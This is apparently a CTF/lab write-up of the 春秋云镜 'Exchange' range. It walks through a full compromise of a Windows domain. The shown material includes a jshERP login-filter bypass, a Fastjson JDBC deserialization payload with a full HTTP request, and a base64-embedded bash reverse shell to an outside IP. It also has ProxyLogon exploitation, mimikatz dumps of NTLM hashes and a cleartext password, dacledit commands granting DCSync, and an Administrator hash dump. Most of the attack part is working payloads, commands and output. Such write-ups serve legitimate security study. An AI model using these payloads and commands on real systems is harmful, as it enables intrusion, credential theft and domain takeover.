March 19, 2024

春秋云镜 Exchange Writeup

Key points

Fastjson JDBC attack, Exchange ProxyLogon RCE, DCSync attack, MISC

Flag1

Target range address: 39.99.233.132
Start by running fscan over it.

                     fscan version: 1.7.1
start infoscan
(icmp) Target 39.99.233.132 is alive
[*] Icmp alive hosts len is: 1
39.99.233.132:80 open
39.99.233.132:8000 open
39.99.233.132:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle:http://39.99.233.132 code:200 len:19813 title:lumia
[*] WebTitle:http://39.99.233.132:8000 code:302 len:0 title:None 跳转url: http://39.99.233.132:8000/login.html
[*] WebTitle:http://39.99.233.132:8000/login.html code:200 len:5662 title:Lumia ERP

华夏ERP (jshERP) is listening on port 8000.
The known combination for this product is a credential leak followed by an authenticated RCE in the backend:
http://39.99.233.132:8000/user/getAllList;.ico
The `;.ico` suffix gets the request past the login filter, which waves through anything that looks like a static resource, while Spring still routes it to /user/getAllList.
This returns the admin user's record, including the password hash; cmd5 resolves it to 123456.
So we have an admin credential pair: admin/123456
https://www.cnblogs.com/bmjoker/p/14856437.html
The backend search endpoint hands the `search` parameter to Fastjson 1.2.55 for deserialization. The challenge's stated topic is JDBC, so the PoC to look for is the JDBC-connection variant:
https://su18.org/post/fastjson/#8-fastjson-1268

The payload below chains two things. The outer `@type` of java.lang.AutoCloseable becomes the expected class, which is what lets the inner com.mysql.jdbc.JDBC4Connection `@type` through checkAutoType. Constructing that connection makes the application's MySQL Connector/J dial our rogue MySQL server with autoDeserialize=true and the ServerStatusDiffInterceptor configured; the interceptor runs SHOW SESSION STATUS, and the BLOB the rogue server returns is fed straight into ObjectInputStream. The rogue server answers with a CommonsCollections gadget chain, and the `user` field tells it which command to embed: it is base64 of `deser_CC31_bash -c {echo,...}|{base64,-d}|{bash,-i}`, i.e. a bash reverse shell to 114.116.119.253:7777. Note that the request as actually sent (further below) points portToConnectTo and the URL at 3308 while the Properties still say 3306; whichever port your rogue listener uses, keep them consistent.

{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "114.116.119.253",
"portToConnectTo": 3306,
"url": "jdbc:mysql://114.116.119.253:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"databaseToConnectTo": "test",
"info": {
"@type": "java.util.Properties",
"PORT": "3306",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"user": "base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9",
"PORT.1": "3306",
"HOST.1": "172.20.64.40",
"NUM_HOSTS": "1",
"HOST": "172.20.64.40",
"DBNAME": "test"
}
}
GET /user/list?search=%7B%0A%09%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%0A%09%22%40type%22%3A%20%22com.mysql.jdbc.JDBC4Connection%22%2C%0A%09%22hostToConnectTo%22%3A%20%22114.116.119.253%22%2C%0A%09%22portToConnectTo%22%3A%203308%2C%0A%09%22url%22%3A%20%22jdbc%3Amysql%3A%2F%2F114.116.119.253%3A3308%2Ftest%3FautoDeserialize%3Dtrue%26statementInterceptors%3Dcom.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%22databaseToConnectTo%22%3A%20%22test%22%2C%0A%09%22info%22%3A%20%7B%0A%09%09%22%40type%22%3A%20%22java.util.Properties%22%2C%0A%09%09%22PORT%22%3A%20%223306%22%2C%0A%09%09%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%09%22autoDeserialize%22%3A%20%22true%22%2C%0A%09%09%22user%22%3A%20%22base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9%22%2C%0A%09%09%22PORT.1%22%3A%20%223306%22%2C%0A%09%09%22HOST.1%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22NUM_HOSTS%22%3A%20%221%22%2C%0A%09%09%22HOST%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22DBNAME%22%3A%20%22test%22%0A%09%7D%0A%7D&currentPage=1&pageSize=10 HTTP/1.1
Host: 39.99.233.132:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.99.233.132:8000/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=B49FB20B635BD8913377199CAAED066E; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1697723127; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1697724188
If-Modified-Since: Sun, 23 Oct 2022 11:30:06 GMT
Connection: close


That gives us a webshell. Next I want persistence, so I drop a vshell agent.
Grab the flag first.
Then wait on the vshell server for the host to call back.

Flag2

Once the host has called back, the first thing is to upload fscan and scan the internal network for post-exploitation.

[*] 172.22.3.9           XIAORANG\XIAORANG-EXC01    Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle:http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle:http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle:https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle:http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle:https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle:https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook

https://172.22.3.9
An Outlook Web App login page, and the hostname XIAORANG-EXC01 confirms this is Exchange. Given the challenge's topic, the intended route is ProxyLogon: the SSRF in the Exchange front end chained with the post-auth file write to drop a webshell.
Before that we need a route into the internal network. vshell provides a convenient tunnel: start a socks5 proxy on the agent and point proxychains at it.
With the proxy configured, pull out the exploit:
https://github.com/hausec/ProxyLogon
This exploit runs under Python 2.
proxychains python2 exchange-rce.py 172.22.3.9 [email protected]
Getting a shell this way is clumsy, so I start AntSword (蚁剑) and connect it to the dropped webshell instead.
Remember to enable "ignore HTTPS certificate".
Then we need persistence again. vshell is the choice once more, but this host has no outbound internet access, so everything has to go through AntSword.

Flag4

Standard Windows domain flow. Our current process runs as SYSTEM, so mimikatz can be used directly. Run fscan first, and upload mimikatz along the way. In the log below, `privilege::debug` fails with c0000061 (STATUS_PRIVILEGE_NOT_HELD); that is harmless here, because the process already has the access to LSASS it needs and `sekurlsa::logonpasswords` succeeds anyway.

C:\迅雷下载> type 1.log
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 2394476 (00000000:0024896c)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 21:46:20
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 104787 (00000000:00019953)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 21:44:10
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 104855 (00000000:00019997)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 21:44:10
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63573 (00000000:0000f855)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 10511454 (00000000:00a0645e)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 22:25:26
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 24ede8bf5898e43b56afa207ee5b42d2
* SHA1 : 5fa54554e61298d10a8aab3565d17cb17d84fb5a
* DPAPI : d3eae48eca56207938fc8ef39add245a
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2328428 (00000000:0023876c)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:46:18
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/19 21:44:10
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 63606 (00000000:0000f876)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 9587463cfa3fd1ea760c401e2c52e224
* SHA1 : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
ssp :
credman :
Authentication Id : 0 ; 22399 (00000000:0000577f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/10/19 21:43:58
SID :
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
kerberos :
ssp :
[00000000]
* Username : [email protected]
* Domain : (null)
* Password : &k$@DY98tIt>P.Ydx2!Xl=h(2XWQB}wu9]Xi3RZ=hQyV{0iSp-9?EmAxZf{GY}Dx0cpEv{kGj5OUjq}x(v!_Y_*Ke0kg&{|32}r15W2Lq}oE1H59a-l4N$|55dU#GyyD
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/19 21:43:58
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10115413 (00000000:009a5955)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 22:24:49
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 24ede8bf5898e43b56afa207ee5b42d2
* SHA1 : 5fa54554e61298d10a8aab3565d17cb17d84fb5a
* DPAPI : d3eae48eca56207938fc8ef39add245a
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 9467606 (00000000:009076d6)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2023/10/19 22:11:36
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 2328450 (00000000:00238782)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:46:18
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Everything has been dumped. We now hold NTLM hashes for XIAORANG domain accounts, which would normally feed a pass-the-hash spray.
Apparently SMB isn't reachable, so the spray goes nowhere. No matter; this is where BloodHound comes in for collection:
sharphound.exe -c all
Import the output into BloodHound and analyse it. The wait is slow, neo4j being neo4j...

Borrowing XZ's screenshot here; damn, my BloodHound hung while uploading the JSON, how annoying.

DCSync Dump

https://github.com/CravateRouge/bloodyAD
A handier tool for this step: use a WriteDacl right to grant DCSync and then dump the hashes. (The commands below actually use dacledit.py from the impacket examples, which does the same job.)
With WriteDacl on the domain object we can add any ACE for any domain principal, so here we grant the Zhangtong user DCSync. Our current host XIAORANG-EXC01 is a member of the Exchange group, which is what gives it WriteDacl.
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal Zhangtong -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2
That's not how I actually did it, though. It seems simpler to grant DCSync to the current machine, i.e. our own machine account, and then dump with mimikatz directly on the box:
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2

-hashes: the NTLM hash of the account we authenticate as, here the machine account (LM half left empty)
-action: write, i.e. add an ACE
-rights: the right to grant; DCSync expands to the DS-Replication-Get-Changes family of extended rights
-principal: the account that receives the right
-target-dn: the object whose DACL is modified, here the domain head
-dc-ip: the domain controller's IP

dacledit.py saves a backup of the original DACL before writing; keep that file so the ACE can be rolled back with -action restore, and confirm the write took with -action read before moving on.

The DC's IP (172.22.3.2) came from the fscan results.
Now dump with mimikatz:
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log

C:\迅雷下载> mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log
C:\迅雷下载> type 5.log
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /user:Administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2023/10/19 21:43:49
Object Security ID : S-1-5-21-533686307-2117412543-4200729784-500
Object Relative ID : 500
Credentials:
Hash NTLM: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 0: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 1: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 2: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 3: 7acbc09a6c0efd81bfa7d5a1d4238beb
lm - 0: f2ec8e584adb61457cfe4f77ea486895
lm - 1: 0f3223fca69c1d65a67c729a74e20a42
lm - 2: eae2ede2edea9c03fdd0c6e236646d41
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : e5b0c4a82f7fbf0708b67d701a6aa8b0
* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf
des_cbc_md5 (4096) : d9c4a4d5348f0d73
OldCredentials
aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf
des_cbc_md5 (4096) : d9c4a4d5348f0d73
OlderCredentials
aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf
des_cbc_md5 (4096) : d9c4a4d5348f0d73
* Primary:Kerberos *
Default Salt : XIAORANG.LABAdministrator
Credentials
des_cbc_md5 : d9c4a4d5348f0d73
OldCredentials
des_cbc_md5 : d9c4a4d5348f0d73
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 e09c3dfc9c6efe284d857c058dc1db55
02 fbf9a181b276a735c3aa2dadd77e134c
03 abfd5c1956c049d4790c90d77e679564
04 e09c3dfc9c6efe284d857c058dc1db55
05 01b9558961ba8e6d3e242ad0a573daaf
06 421fafa7082865ce50c3d8f5a09172aa
07 3b33abf4513bdc142aeff14dcc44bb6c
08 67801cafacc256dbffa5b6550f3eb98d
09 eca500dc4bf4100b73d1adcbdc4fdef6
10 dc6a3d5522ca864a8668b3c1a49255b1
11 d692f02402a8f38e6c242af609bedc45
12 67801cafacc256dbffa5b6550f3eb98d
13 2c4c7abb5884d0554c33a355a9f7c21e
14 299c1210a681d700eb7840ce54808648
15 94dd87c64e01028a3d5f07af9ea9aa76
16 36e79452fc63c6af5f08f158fb788622
17 afc9d511a5dfcf8e41fa37f38ecc6af7
18 fd2dbb5552b731a4a78c103dfe64e3f1
19 db7b0bbeb4937dcb8ce461265a10b21e
20 7358a3b9387c41e5da0b7f2d769fe5d2
21 b9d78e29e532a095144a1eb0c829b255
22 192b18e2b0cd9b907936385b8bda7b36
23 ba08bed581e1da740999962c6a39ae91
24 f4afecc454a2b6decc5e9a934ba5db4b
25 f095e8a655cad918f5606bb764daea95
26 702cbf78e979f2914a877d8c53f18862
27 bbca37af1d189426db4899dc8f750150
28 ef2d30ad6765b5f13c65ade611e33312
29 b0aa1ed6b84d876eb160b8f30c5b40a4

Then log in with psexec using the Administrator hash.
Owned.

Flag3

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab" >7.log
(dcsync needs a /user or /all argument; add /all /csv to pull every account in one go)
There's a secret.zip in the lumia user's directory, pure MISC, so I'm not doing it...
Time is money!
flag{cf0c753c-233f-4729-8984-0746ea5878b7}


About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#Intranet##Java##FastJson##private